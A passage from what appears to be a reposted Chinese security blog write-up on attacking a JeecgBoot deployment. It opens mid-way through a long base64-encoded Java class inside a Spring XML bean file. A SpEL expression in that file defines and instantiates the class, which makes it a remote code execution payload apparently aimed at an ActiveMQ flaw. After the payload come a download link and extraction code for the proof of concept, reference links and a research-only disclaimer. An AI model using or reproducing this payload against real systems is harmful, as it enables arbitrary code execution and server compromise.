BZsADysZBAMVBbYBQKf/6yu2AUSwAAAAAwAZAAAAHgAHAAAAmgAIAJsAEQCcABoAnQAhAJ8ALQCgADkAogAaAAAAPgAGAAAAPgEjAKQAAAAIADYBJAElAAEAEQAtASYBJwACABoAJAEoASkAAwAhAB0BKgCkAAQAKgAUASsBAgAFACgAAAAcAAL/ACEABQcAyAcBLQcBLwcBMQcAyAAA/AAXAQALAAAABAABAA0ACABnAFkAAgAHAAAAVwACAAMAAAARKiu4AUxNLAS2AU8sKrYBULAAAAACABkAAAAOAAMAAACmAAYApwALAKgAGgAAACAAAwAAABEBRQAcAAAAAAARAUYBBAABAAYACwFHAUgAAgALAAAABAABABgACAFJAUoAAgAHAAAAxwADAAQAAAAoKrYAek0sxgAZLCu2AVdOLQS2AU8tsE4stgFaTaf/6bsBUlkrtwFbvwABAAkAFQAWAVIABAAZAAAAJgAJAAAArAAFAK0ACQCvAA8AsAAUALEAFgCyABcAswAcALQAHwC2ABoAAAA0AAUADwAHAUcBSAADABcABQBKAVMAAwAAACgBRQAcAAAAAAAoAUYBBAABAAUAIwCnAKgAAgAiAAAADAABAAUAIwCnARAAAgAoAAAADQAD/AAFBwB8UAcBUggACwAAAAQAAQFSACgAWABZAAIABwAAAEIABAACAAAADiorA70AfAO9AAS4AO2wAAAAAgAZAAAABgABAAAAugAaAAAAFgACAAAADgFcABwAAAAAAA4BXQEEAAEACwAAAAgAAwCcAJoAngApAFgA6wACAAcAAAIXAAMACQAAAMoqwQB8mQAKKsAAfKcAByq2AHo6BAE6BRkEOgYZBccAZBkGxgBfLMcAQxkGtgFrOgcDNggVCBkHvqIALhkHFQgytgFsK7YBb5kAGRkHFQgytgFzvpoADRkHFQgyOgWnAAmECAGn/9CnAAwZBisstgDROgWn/6k6BxkGtgFaOgan/50ZBccADLsAnFkrtwF0vxkFBLYA1yrBAHyZABoZBQEttgDfsDoHuwCVWRkHtgF3twF4vxkFKi22AN+wOge7AJVZGQe2AXe3AXi/AAMAJQByAHUAnACcAKMApACaALMAugC7AJoAAwAZAAAAbgAbAAAAvgAUAL8AFwDBABsAwgAlAMQAKQDGADAAxwA7AMgAVgDJAF0AygBgAMcAZgDNAGkAzgByANIAdQDQAHcA0QB+ANIAgQDUAIYA1QCPANcAlQDYAJwA2gCkANsApgDcALMA4AC7AOEAvQDiABoAAAB6AAwAMwAzAQEBAgAIADAANgFeAV8ABwB3AAcASgFgAAcApgANAEoBYQAHAL0ADQBKAWEABwAAAMoBRQAcAAAAAADKAV0BBAABAAAAygFiAWMAAgAAAMoBZADhAAMAFAC2AKcAqAAEABcAswFlAKYABQAbAK8BZgCoAAYAKAAAAC8ADg5DBwB8/gAIBwB8BwDTBwB8/QAXBwFnASz5AAUCCEIHAJwLDVQHAJoORwcAmgALAAAACAADAJwAngCaAAgBeQAWAAEABwAAACUAAgAAAAAACbsAAlm3AXpXsQAAAAEAGQAAAAoAAgAAACEACAAiAAA=">
</constructor-arg>
</bean>
<bean class="#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.fasterxml.jackson.o.ReportUtil',T(org.springframework.util.Base64Utils).decodeFromString(ClassBase64Str.toString()),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance().test1()}">
</bean>
</beans>
POC获取:
https://www.alipan.com/s/7L7nszHfXAt
提取码:38qg
参考
https://forum.butian.net/share/1339
https://github.com/Hutt0n0/ActiveMqRCE
原文始发于微信公众号(良月安全):[技术分享]记一次JeecgBoot实战分享
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论